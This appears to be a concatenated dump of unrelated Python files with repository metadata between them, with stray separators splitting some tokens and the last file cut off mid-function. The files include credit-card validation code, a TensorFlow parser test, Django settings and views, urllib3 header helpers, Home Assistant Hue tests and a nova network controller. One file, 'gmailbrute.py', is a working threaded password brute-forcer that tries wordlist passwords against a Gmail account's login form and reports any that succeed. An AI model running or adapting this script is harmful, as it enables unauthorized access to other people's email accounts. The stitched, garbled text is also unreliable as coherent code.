# Check if the card is of known type
for brand, regexp in self.B
|
RANDS.items():
if regexp.match(self.number):
return brand
|
# Default to unknown brand
return self.BRAND_UNKNOWN
@property
def friendly_brand(self):
"""
Returns the human-friendly brand name of the card.
"""
return self.FRIENDLY_BRANDS.get(self.brand, 'unknown')
@property
def is_test(self):
"""
Returns whether or not the card's number is a known test number.
"""
return self.number in self.TESTS
@property
def is_expired(self):
"""
Returns whether or not the card is expired.
"""
return self.exp_date.is_expired
@property
def is_valid(self):
"""
Returns whether or not the card is a valid card for making payments.
"""
return not self.is_expired and self.is_mod10_valid
@property
def is_mod10_valid(self):
"""
Returns whether or not the card's number validates against the mod10
algorithm (Luhn algorithm), automatically returning False on an empty
value.
"""
# Check for empty string
if not self.number:
return False
# Run mod10 on the number
dub, tot = 0, 0
for i in range(len(self.number) - 1, -1, -1):
for c in str((dub + 1) * int(self.number[i])):
tot += int(c)
dub = (dub + 1) % 2
return (tot % 10) == 0
class ExpDate(object):
"""
An expiration date of a credit card.
"""
def __init__(self, month, year):
"""
Attaches the last possible datetime for the given month and year, as
well as the raw month and year values.
"""
# Attach month and year
self.month = month
self.year = year
# Get the month's day count
weekday, day_count = monthrange(year, month)
# Attach the last possible datetime for the provided month and year
self.expired_after = datetime.datetime(
year,
month,
day_count,
23,
59,
59,
999999
)
def __repr__(self):
"""
Returns a typical repr with a simple representation of the exp date.
"""
return u'<ExpDate expired_after={d}>'.format(
d=self.expired_after.strftime('%m/%Y')
)
@property
def is_expired(self):
"""
Returns whether or not the expiration date has passed in American Samoa
(the last timezone).
"""
# Get the current datetime in UTC
utcnow = datetime.datetime.utcnow()
# Get the datetime minus 11 hours (Samoa is UTC-11)
samoa_now = utcnow - datetime.timedelta(hours=11)
# Return whether the expired_after time has passed in American Samoa
return samoa_now > self.expired_after
@property
def mmyyyy(self):
"""
Returns the expiration date in MM/YYYY format.
"""
return self.expired_after.strftime('%m/%Y')
@property
def mmyy(self):
"""
Returns the expiration date in MM/YY format (the same as is printed on
cards).
"""
return self.expired_after.strftime('%m/%y')
@property
def MMYY(self):
"""
Returns the expiration date in MMYY format
"""
return self.expired_after.strftime('%m%y')
@property
def mm(self):
"""
Returns the expiration date in MM format.
"""
return self.expired_after.strftime('%m')
@property
def yyyy(self):
"""
Returns the expiration date in YYYY format.
"""
return self.expired_after.strftime('%Y')
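# Illustrative only; not part of pycard. A stand-alone sketch of the mod10
# (Luhn) check that Card.is_mod10_valid implements above, written the textbook
# way: double every second digit from the right and sum the resulting digits.
def _luhn_valid(number):
    total = 0
    double = False
    for ch in reversed(number):
        digit = int(ch)
        if double:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
        double = not double
    return total % 10 == 0

if __name__ == '__main__':
    assert _luhn_valid('4111111111111111')       # a common Visa test number
    assert not _luhn_valid('4111111111111112')   # same number with the check digit changed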
|
nburn42/tensorflow
|
tensorflow/contrib/autograph/pyct/parser_test.py
|
Python
|
apache-2.0
| 1,514
| 0.003303
|
#
|
Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
|
or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for parser module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import textwrap
from tensorflow.contrib.autograph.pyct import parser
from tensorflow.python.platform import test
class ParserTest(test.TestCase):
def test_parse_entity(self):
def f(x):
return x + 1
mod, _ = parser.parse_entity(f)
self.assertEqual('f', mod.body[0].name)
def test_parse_str(self):
mod = parser.parse_str(
textwrap.dedent("""
def f(x):
return x + 1
"""))
self.assertEqual('f', mod.body[0].name)
def test_parse_expression(self):
node = parser.parse_expression('a.b')
self.assertEqual('a', node.value.id)
self.assertEqual('b', node.attr)
if __name__ == '__main__':
test.main()
|
knightmare2600/d4rkc0de
|
bruteforce/gmailbrute.py
|
Python
|
gpl-2.0
| 2,738
| 0.039445
|
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsea
|
rch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
|
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py <user> <wordlist>"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
|
adijo/rosalind
|
old/gene_enumerations.py
|
Python
|
gpl-2.0
| 682
| 0.014663
|
#Aditya Joshi
#Enumerating Oriented Gene Ordering
from itertools import permutations,product
from math import fabs
n = int(raw_input())
def make_set(n):
set = []
for x in range(1,n+1):
set += [x]
return set
def plusAndMinusPermutations(items):
for p in permutations(items,len(items)):
for signs in product([-1,1], repeat=len(items)):
yield [a*s
|
ign for a,si
|
gn in zip(p,signs)]
def array_to_string(list):
string = ""
string += str(list[0]) + " " + str(list[1])
return string
count = 0
for x in plusAndMinusPermutations(make_set(n)):
print array_to_string(x)
count += 1
print count
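# Illustrative cross-check, not part of the original solution: for n items
# there are 2**n * n! signed permutations, which is exactly what the generator
# above enumerates (e.g. n = 2 yields 8 orderings).
from math import factorial

def signed_permutation_count(n):
    return (2 ** n) * factorial(n)

assert signed_permutation_count(2) == 8
assert signed_permutation_count(3) == 48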
|
bmi-forum/bmi-pyre
|
pythia-0.8/packages/pyre/pyre/units/force.py
|
Python
|
gpl-2.0
| 545
| 0
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from SI import me
|
ter, second
gal = 0.01*meter/second**2
# version
__id__ = "$Id: force.py,v 1.1.1.1 2005/03/08 16:13:41 aivazis Exp $"
#
# End of file
|
kave/Face-Off
|
face-off/settings/production.py
|
Python
|
cc0-1.0
| 866
| 0.001155
|
from .base import *
import dj_database_url
if os.environ.get('DEBUG') == 'False':
DEBUG = False
else:
DEBUG = True
try:
from .local import *
except ImportError:
pass
ALLOWED_HOSTS = ['*']
DATABASES = {'default': dj_database_url.config()}
SOCIAL_AUTH_YAMMER_KEY = os.environ.get('SOCIAL_AUTH_YAMMER_KEY')
SOCIAL_AUTH_YAMMER_SECRET = os.environ.get('SOCIAL_AUTH_YAMMER_SECRET')
AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']
STATICFILES_STORAGE = 'core.sto
|
rage.S3PipelineManifestStorage'
STATIC_URL = 'http://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
AWS_QUERYSTRING_AUTH = False
AWS_S3_FILE_OVERWRITE = True
PIPELINE_JS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_CSS_COMPRESSOR = 'pipeline.compressors.yuglify.
|
YuglifyCompressor'
PIPELINE_YUGLIFY_BINARY = '/app/.heroku/python/bin/yuglify'
|
rpiotti/Flask-AppBuilder
|
flask_appbuilder/models/base.py
|
Python
|
bsd-3-clause
| 7,479
| 0.00107
|
import datetime
import logging
from functools import reduce
from flask_babelpkg import lazy_gettext
from .filters import Filters
log = logging.getLogger(__name__)
class BaseInterface(object):
"""
Base class for all data model interfaces.
Sub class it to implement your own interface for some data engine.
"""
obj = None
filter_converter_class = None
""" when sub classing override with your own custom filter converter """
""" Messages to display on CRUD Events """
|
add_row_message = lazy_gettext('Added Row')
edit_row_message = lazy_gettext('Changed Row')
delete_row_message = lazy_gettext('Deleted Row')
delete_integrit
|
y_error_message = lazy_gettext('Associated data exists, please delete them first')
add_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
edit_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
general_error_message = lazy_gettext('General Error')
""" Tuple with message and text with severity type ex: ("Added Row", "info") """
message = ()
def __init__(self, obj):
self.obj = obj
def _get_attr_value(self, item, col):
if not hasattr(item, col):
# it's an inner obj attr
return reduce(getattr, col.split('.'), item)
if hasattr(getattr(item, col), '__call__'):
# its a function
return getattr(item, col)()
else:
# its attribute
return getattr(item, col)
def get_filters(self, search_columns=None):
search_columns = search_columns or []
return Filters(self.filter_converter_class, self, search_columns)
def get_values_item(self, item, show_columns):
return [self._get_attr_value(item, col) for col in show_columns]
def _get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
retlst = []
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
retlst.append(retdict)
return retlst
def get_values(self, lst, list_columns):
"""
Get Values: formats values for list template.
returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
:param lst:
The list of item objects from query
:param list_columns:
The list of columns to include
"""
for item in lst:
retdict = {}
for col in list_columns:
retdict[col] = self._get_attr_value(item, col)
yield retdict
def get_values_json(self, lst, list_columns):
"""
Converts list of objects from query to JSON
"""
result = []
for item in self.get_values(lst, list_columns):
for key, value in list(item.items()):
if isinstance(value, datetime.datetime) or isinstance(value, datetime.date):
value = value.isoformat()
item[key] = value
if isinstance(value, list):
item[key] = [str(v) for v in value]
result.append(item)
return result
"""
    Returns the model's class name
useful for auto title on views
"""
@property
def model_name(self):
return self.obj.__class__.__name__
"""
Next methods must be overridden
"""
def query(self, filters=None, order_column='', order_direction='',
page=None, page_size=None):
pass
def is_image(self, col_name):
return False
def is_file(self, col_name):
return False
def is_gridfs_file(self, col_name):
return False
def is_gridfs_image(self, col_name):
return False
def is_string(self, col_name):
return False
def is_text(self, col_name):
return False
def is_integer(self, col_name):
return False
def is_float(self, col_name):
return False
def is_boolean(self, col_name):
return False
def is_date(self, col_name):
return False
def is_datetime(self, col_name):
return False
def is_relation(self, prop):
return False
def is_relation_col(self, col):
return False
def is_relation_many_to_one(self, prop):
return False
def is_relation_many_to_many(self, prop):
return False
def is_relation_one_to_one(self, prop):
return False
def is_relation_one_to_many(self, prop):
return False
def is_nullable(self, col_name):
return True
def is_unique(self, col_name):
return False
def is_pk(self, col_name):
return False
def is_fk(self, col_name):
return False
def get_max_length(self, col_name):
return -1
def get_min_length(self, col_name):
return -1
"""
-----------------------------------------
FUNCTIONS FOR CRUD OPERATIONS
-----------------------------------------
"""
def add(self, item):
"""
Adds object
"""
raise NotImplementedError
def edit(self, item):
"""
Edit (change) object
"""
raise NotImplementedError
def delete(self, item):
"""
Deletes object
"""
raise NotImplementedError
def get_col_default(self, col_name):
pass
def get_keys(self, lst):
"""
return a list of pk values from object list
"""
pk_name = self.get_pk_name()
return [getattr(item, pk_name) for item in lst]
def get_pk_name(self, item):
"""
Returns the primary key name
"""
raise NotImplementedError
def get_pk_value(self, item):
return getattr(item, self.get_pk_name())
def get(self, pk):
"""
return the record from key
"""
pass
def get_related_model(self, prop):
raise NotImplementedError
def get_related_interface(self, col_name):
"""
Returns a BaseInterface for the related model
of column name.
:param col_name: Column name with relation
:return: BaseInterface
"""
raise NotImplementedError
def get_related_obj(self, col_name, value):
raise NotImplementedError
def get_related_fk(self, model):
raise NotImplementedError
def get_columns_list(self):
"""
Returns a list of all the columns names
"""
return []
def get_user_columns_list(self):
"""
Returns a list of user viewable columns names
"""
return self.get_columns_list()
def get_search_columns_list(self):
"""
Returns a list of searchable columns names
"""
return []
def get_order_columns_list(self, list_columns=None):
"""
Returns a list of order columns names
"""
return []
def get_relation_fk(self, prop):
pass
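# Illustrative only; not part of Flask-AppBuilder. A small sketch of how
# _get_attr_value resolves plain attributes, callables and dotted inner-object
# paths; the _Owner/_Item classes are made up for the example.
if __name__ == '__main__':
    class _Owner(object):
        name = 'Alice'

    class _Item(object):
        title = 'Report'
        owner = _Owner()

        def word_count(self):
            return 2

    interface = BaseInterface(obj=None)
    item = _Item()
    assert interface._get_attr_value(item, 'title') == 'Report'      # plain attribute
    assert interface._get_attr_value(item, 'word_count') == 2        # callable
    assert interface._get_attr_value(item, 'owner.name') == 'Alice'  # dotted inner path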
|
cbrafter/CrowdTLL
|
generalCode/sumoConfigGen.py
|
Python
|
gpl-3.0
| 1,642
| 0.001827
|
"""
@file sumoConfigGen.py
@author Craig Rafter
@date 29/01/2016
Code to generate a config file for a SUMO model.
"""
def sumoConfigGen(modelname='simpleT', configFile='./models/simpleT.sumocfg',
exportPath='../', AVratio=0, stepSize=0.01,
run=0, port=8813):
configXML = open(configFile, 'w')
print >> configXML, """<configuration>
<input>
<net-file value="{model}.net.xml"/>
<route-files value="{model}.rou.xml"/>
<gui-settings-file value="gui-settings.cfg"/>
<game value="1"/>
<start value="1"/>
<!--additional-files value="{model}.det.xml"/-->
</input>
<output>
<!--<summary-output value="{expPath}summary{AVR:03d}_{Nrun:03d}.xml"/>-->
<!--tripinfo-output value="{expPath}tripinfo{AVR:03d}_{Nrun:03d}.xml"/-->
<!--<vehroute-
|
output value="{expPath}vehroute{AVR:03d}_{Nrun:03d}.xml"/-->
<!--queue-output value="{expPath}queuedata{AVR:03d}_{Nrun:03d}.xml"/-->
</output>
<time>
<begin value="0"/>
<step-length value="{stepSz}"/>
</time>
<processing>
<!--TURN OFF TELEPORTING-->
<time-to-teleport value="-1"/>
</processing>
<report>
|
<no-step-log value="true"/>
<error-log value="logfile.txt"/>
</report>
<traci_server>
<remote-port value="{SUMOport}"/>
</traci_server>""".format(model=modelname, expPath=exportPath,
AVR=int(AVratio*100), stepSz=stepSize,
Nrun=run, SUMOport=port)
print >> configXML, "</configuration>"
configXML.close()
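# Illustrative usage only; the paths, AV ratio, run number and port below are
# made-up values rather than settings taken from the CrowdTLL experiments.
if __name__ == '__main__':
    sumoConfigGen(modelname='simpleT',
                  configFile='./models/simpleT.sumocfg',
                  exportPath='../results/',
                  AVratio=0.1,
                  stepSize=0.1,
                  run=1,
                  port=8813)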
|
la0rg/Genum
|
GenumCore/vendor/urllib3/util/request.py
|
Python
|
mit
| 2,180
| 0.000917
|
from __future__ import absolute_import
from base64 import b64encode
from ..packages.six import b
ACCEPT_ENCODING = 'gzip,deflate'
|
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None, proxy_basic_auth=None, disable_cache=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates
|
to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
:param proxy_basic_auth:
Colon-separated username:password string for 'proxy-authorization: basic ...'
auth header.
:param disable_cache:
If ``True``, adds 'cache-control: no-cache' header.
Example::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = ACCEPT_ENCODING
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
b64encode(b(basic_auth)).decode('utf-8')
if proxy_basic_auth:
headers['proxy-authorization'] = 'Basic ' + \
b64encode(b(proxy_basic_auth)).decode('utf-8')
if disable_cache:
headers['cache-control'] = 'no-cache'
return headers
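# Illustrative only, in the same spirit as the docstring examples above; the
# credentials are made up.
if __name__ == '__main__':
    headers = make_headers(keep_alive=True,
                           accept_encoding=['gzip', 'deflate'],
                           basic_auth='user:secret',
                           disable_cache=True)
    assert headers['accept-encoding'] == 'gzip,deflate'   # list values are comma-joined
    assert headers['authorization'] == 'Basic dXNlcjpzZWNyZXQ='
    assert headers['cache-control'] == 'no-cache'
    assert headers['connection'] == 'keep-alive'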
|
mc10/project-euler
|
problem_2.py
|
Python
|
mit
| 430
| 0.025701
|
'''
Problem 2
@author: Kevin Ji
'''
def sum_even_fibonacci( max_value ):
# Initial two elements
prev_term = 1
cur_term = 2
tem
|
p_sum = 2
while cur_term < max_value:
next_term = prev_term + cur_term
prev_term = cur_term
cur_term = next_term
if cur_term % 2
|
== 0:
temp_sum += cur_term
return temp_sum
print( sum_even_fibonacci( 4000000 ) )
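# Stand-alone cross-check, not part of the original solution: it sums even
# Fibonacci terms strictly below the limit and agrees with the script above
# for a limit of 4,000,000.
def even_fib_sum(limit):
    prev_term, cur_term = 1, 2
    total = 0
    while cur_term < limit:
        if cur_term % 2 == 0:
            total += cur_term
        prev_term, cur_term = cur_term, prev_term + cur_term
    return total

assert even_fib_sum(4000000) == 4613732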
|
titilambert/home-assistant
|
tests/components/hue/test_init.py
|
Python
|
apache-2.0
| 8,339
| 0.00024
|
"""Test Hue setup process."""
from unittest.mock import Mock
import pytest
from homeassistant import config_entries
from homeassistant.components import hue
from homeassistant.setup import async_setup_component
from tests.async_mock import AsyncMock, patch
from tests.common import MockConfigEntry
@pytest.fixture
def mock_bridge_setup():
"""Mock bridge setup."""
with patch.object(hue, "HueBridge") as mock_bridge:
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(bridgeid="mock-id")
yield mock_bridge.return_value
async def test_setup_with_no_config(hass):
"""Test that we do not discover anything or try to set up a bridge."""
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
# No flows started
assert len(hass.config_entries.flow.async_progress()) == 0
# No configs stored
assert hass.data[hue.DOMAIN] == {}
async def test_setup_defined_hosts_known_auth(hass):
"""Test we don't initiate a config entry if config bridge is known."""
MockConfigEntry(domain="hue", data={"host": "0.0.0.0"}).add_to_hass(hass)
with patch.object(hue, "async_setup_entry", return_value=True):
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: [
{
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
{hue.CONF_HOST: "1.1.1.1"},
]
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
},
"1.1.1.1": {hue.CONF_HOST: "1.1.1.1"},
}
async def test_setup_defined_hosts_no_known_auth(hass):
"""Test we initiate config entry if config bridge is not known."""
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
# Flow started for discovered bridge
assert len(hass.config_entries.flow.async_progress()) == 1
# Config stored for domain.
assert hass.data[hue.DATA_CONFIGS] == {
"0.0.0.0": {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
async def test_config_passed_to_config_entry(hass):
"""Test that configured options for a host are loaded via config entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
mock_registry = Mock()
with patch.object(hue, "HueBridge") as mock_bridge, patch(
"homeassistant.helpers.device_registry.async_get_registry",
return_value=mock_registry,
):
mock_bridge.return_value.async_setup = AsyncMock(return_value=True)
mock_bridge.return_value.api.config = Mock(
mac="mock-mac",
bridgeid="mock-bridgeid",
modelid="mock-modelid",
swversion="mock-swversion",
)
# Can't set name via kwargs
mock_bridge.return_value.api.config.name = "mock-name"
assert (
await async_setup_component(
hass,
hue.DOMAIN,
{
hue.DOMAIN: {
hue.CONF_BRIDGES: {
hue.CONF_HOST: "0.0.0.0",
hue.CONF_ALLOW_HUE_GROUPS: False,
hue.CONF_ALLOW_UNREACHABLE: True,
}
}
},
)
is True
)
assert len(mock_bridge.mock_calls) == 2
p_hass, p_entry = mock_bridge.mock_calls[0][1]
assert p_hass is hass
assert p_entry is entry
assert len(mock_registry.mock_calls) == 1
assert mock_registry.mock_calls[0][2] == {
"config_entry_id": entry.entry_id,
"connections": {("mac", "mock-mac")},
"identifiers": {("hue", "mock-bridgeid")},
"manufacturer": "Signify",
"name": "mock-name",
"model": "mock-modelid",
"sw_version": "mock-swversion",
}
async def test_unload_entry(hass, mock_bridge_setup):
"""Test being able to unload an entry."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert len(mock_bridge_setup.mock_calls) == 1
mock_bridge_setup.async_reset = AsyncMock(return_value=True)
assert await hue.async_unload_entry(hass, entry)
assert len(mock_bridge_setup.async_reset.mock_calls) == 1
assert hass.data[hue.DOMAIN] == {}
async def test_setting_unique_id(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_no_other(hass, mock_bridge_setup):
"""Test we set unique ID if not set yet."""
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id"
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
assert entry.unique_id == "mock-id"
async def test_fixing_unique_id_other_ignored(hass, mock_bridge_setup):
"""Test we set unique ID if not
|
set yet."""
MockConfigEntry(
domain=hue.DOMAIN,
data={"host": "0.0.0.0"},
unique_id="mock-id",
source=config_
|
entries.SOURCE_IGNORE,
).add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert entry.unique_id == "mock-id"
assert hass.config_entries.async_entries() == [entry]
async def test_fixing_unique_id_other_correct(hass, mock_bridge_setup):
"""Test we remove config entry if another one has correct ID."""
correct_entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="mock-id",
)
correct_entry.add_to_hass(hass)
entry = MockConfigEntry(
domain=hue.DOMAIN, data={"host": "0.0.0.0"}, unique_id="invalid-id",
)
entry.add_to_hass(hass)
assert await async_setup_component(hass, hue.DOMAIN, {}) is True
await hass.async_block_till_done()
assert hass.config_entries.async_entries() == [correct_entry]
async def test_security_vuln_check(hass):
"""Test that we report security vulnerabilities."""
assert await async_setup_component(hass, "persistent_notification", {})
entry = MockConfigEntry(domain=hue.DOMAIN, data={"host": "0.0.0.0"})
entry.add_to_hass(hass)
config = Mock(bridgeid="", mac="", modelid="BSB002", swversion="1935144020")
config.name = "Hue"
with patch.object(
hue,
"HueBridge",
Mock(
return_value=Mock(
async_setup=AsyncMock(return_value=True), api=Mock(config=config)
)
),
):
assert await async_setup_component(hass, "hue", {})
await hass.async_block_till_done()
|
aspc/mainsite
|
aspc/folio/views.py
|
Python
|
mit
| 1,132
| 0.007951
|
from django.views.generic.detail import DetailView
from django.shortcuts import render, redirect
from django.http import Http404
from aspc.folio.models import Page
class AttachedPageMixin(object):
def get_page(self):
try:
return Page.objects.get(slug=self.page_slug)
except Page.DoesNotExist:
return None
def get_context_data(self, **kwargs
|
):
context = super(AttachedPageMixin, self).get_context_data(**kwargs)
context['page'] = self.get_page()
return context
def page_view(request, slug_path):
'''slug_path: ^(?P<slug_path>(?:[\w\-\d]+/)+)$ '''
slug_parts = slug_path.rstrip('/').split('/')
p
|
ages = Page.objects.exclude(managed=True)
for part in slug_parts:
try:
new_page = pages.get(slug=part)
except Page.DoesNotExist:
raise Http404
else:
pages = new_page.page_set.all()
return render(request, "folio/page.html", {
"title": new_page.title,
"body": new_page.body,
"page": new_page,
"active_section": new_page.path()[0].slug,
})
|
shakamunyi/nova
|
nova/api/openstack/compute/plugins/v3/tenant_networks.py
|
Python
|
apache-2.0
| 8,183
| 0.000122
|
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
import netaddr.core as netexc
from oslo.config import cfg
import six
from webob import exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
import nova.network
from nova.openstack.common import log as logging
from nova import quota
CONF = cfg.CONF
CONF.import_opt('enable_network_quota',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('use_neutron_default_nets',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('neutron_default_tenant_id',
'nova.api.openstack.compute.contrib.os_tenant_networks')
CONF.import_opt('quota_networks',
'nova.api.openstack.compute.contrib.os_tenant_networks')
ALIAS = 'os-tenant-networks'
QUOTAS = quota.QUOTAS
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def network_dict(network):
# NOTE(danms): Here, network should be an object, which could have come
# from neutron and thus be missing most of the attributes. Providing a
# default to get() avoids trying to lazy-load missing attributes.
return {"id": network.get("uuid", None) or network.get("id", None),
"cidr": str(network.get("cidr", None)),
"label": network.get("label", None)}
class TenantNetworkController(wsgi.Controller):
def __init__(self, network_api=None):
self.network_api = nova.network.API()
self._default_networks = []
def _refresh_default_networks(self):
self._default_networks = []
if CONF.use_neutron_default_nets == "True":
try:
self._default_networks = self._get_default_networks()
except Exception:
LOG.exception(_LE("Failed to get default networks"))
def _get_default_networks(self):
project_id = CONF.neutron_default_tenant_id
ctx = nova_context.RequestContext(user_id=None,
project_id=project_id)
networks = {}
for n in self.network_api.get_all(ctx):
networks[n['id']] = n['label']
return [{'id': k, 'label': v} for k, v in networks.iteritems()]
@extensions.expected_errors(())
def index(self, req):
context = req.environ['nova.context']
authorize(context)
networks = list(self.network_api.get_all(context))
if not self._default_networks:
self._refresh_default_networks()
networks.extend(self._default_networks)
return {'networks': [network_dict(n) for n in networks]}
@extensions.expected_errors(404)
def show(self, req, id):
context = req.environ['nova.context']
authorize(context)
try:
network = self.network_api.get(context, id)
except exception.NetworkNotFound:
msg = _("Network not found")
raise exc.HTTPNotFound(explanation=msg)
return {'network': network_dict(network)}
@extensions.expected_errors((403, 404, 409))
@wsgi.response(202)
def delete(self, req, id):
context = req.environ['nova.context']
authorize(context)
reservation = None
try:
if CONF.enable_network_quota:
reservation = QUOTAS.reserve(context, networks=-1)
except Exception:
reservation = None
LOG.exception(_LE("Failed to update usages deallocating "
"network."))
def _rollback_quota(reservation):
if CONF.enable_network_quota and reservation:
